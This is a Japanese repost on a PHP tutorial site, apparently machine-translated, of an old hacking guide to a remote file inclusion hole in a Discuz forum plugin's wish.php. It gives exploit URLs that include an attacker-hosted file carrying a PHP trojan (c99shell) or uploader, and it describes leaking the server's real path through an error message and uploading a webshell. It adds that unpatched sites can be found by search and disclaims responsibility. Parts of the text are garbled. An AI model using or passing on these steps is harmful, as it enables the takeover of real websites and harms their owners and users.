ホームページ > バックエンド開発 > PHPチュートリアル > Discuz プラグインの脆弱性攻撃_PHP チュートリアル

Discuz プラグインの脆弱性攻撃_PHP チュートリアル

WBOY
リリース: 2016-07-13 17:08:51
オリジナル
1071 人が閲覧しました

PS: そういえば、「Hacker X-Files」はこの脆弱性について N 回言及しましたね、笑...
誰かがそれを発表し、誰かがエクスプロイトプログラムを書いたこともあるので、ソースを教えてもらいましたので発表します! by Gui Zai Firefox の誰かがこの穴を発見したようです。よくわかりません
discuz フォーラムの wishing pool プラグインには、DZ ルート ディレクトリに wish.php ファイルがあります。 :
require $discuz_root. './include/discuzcode.func.php';
これは完全なリモート インクルージョンの脆弱性であることは明らかです:
http: //www.163.com/wish.php ?discuz_root=http://www.flyt.cn/xxxx.txt?
xxxx.txt は私の PHP トロイの木馬、c99shell であることを忘れないでください。理由はわかりませんが、成功しませんでした。慎重に実験しなかったことが原因かもしれませんが、「WebShell」は入手できます。 Security Angel の PHP バックドアを使用すると実際の Web シェルをアップロードできないため、次のファイルを使用して Web シェルをアップロードできます。 Web サイトのディレクトリに移動します。





Web サイトの実際のパスを取得する方法は非常に簡単です。 http://www.163.com を開きます。 /wish.php?discuz_root=http://www.flyt.cn/xxxx.txt の最後に疑問符を付けないと、プログラムがエラーを報告し、Web サイトの実際のパスが表示されることがわかります。ファイル内の C:Inetpubvhosts aidu.com bs
は、ハッキングする Web サイトの実際のパスになります。 cntink.php は、アップロードした Web シェルです。 保存したい名前は何でも選択できます。
上記のファイルを txt として保存します。 (他の拡張子も使用できます) それを自分の Web サイトにアップロードします。たとえば、fly.txt という名前を付けて、
http:// www.163.com/wish.php?discuz_root=http:// と開きます。 www.flyt.cn/fly.txt?
OK... アップロード ダイアログ ボックスが表示されます。Web シェルをゆっくりアップロードしてください。 アップロード後のパスは、fly.txt で設定したパスです。
上記の記事は、まったくランダムに書いています。誰かがこの方法を使用してサイトをハッキングして問題を抱えている場合は、私のところに来ないでください...実際、これはパッチがリリースされた後に公開されるべきですが、これは公式のプラグインではなく、他の人がすでに投稿されているので問題ありません!
追記: グループ内の特定の人の言葉を引用すると、Baidu と Google はディスクの URL: wish.php を検索しましたが、抜け穴は修正されていません。


http://www.bkjia.com/PHPjc/629813.html

www.bkjia.com

tru​​ehttp://www.bkjia.com/PHPjc/629813.html技術記事 PS: この脆弱性については、「ハッカー X ファイル」で何度も言及されています (笑)。すでに発表している人もいるし、エクスプロイト プログラムを書いている人もいるから、私が発表します。ソースは Gui Zai でした。言いました...
ソース:php.cn
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート